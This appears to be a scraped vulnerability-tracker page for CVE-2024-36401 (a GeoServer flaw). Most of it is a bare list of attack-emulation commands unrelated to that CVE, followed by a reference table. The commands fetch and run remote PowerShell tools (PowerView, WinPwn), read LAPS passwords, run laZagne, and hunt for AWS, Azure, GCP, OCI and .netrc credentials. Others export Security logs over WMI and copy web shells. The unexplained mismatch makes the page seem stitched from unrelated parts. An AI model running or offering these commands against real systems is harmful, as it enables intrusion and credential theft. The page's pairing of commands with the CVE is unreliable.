IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-36401 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/geotools/geotools/pull/4797 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852 |
| osgeo-org.atlassian.net |
GitHub CVE
x_refsource_MISC
|
https://osgeo-org.atlassian.net/browse/GEOT-7587 |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-36401 |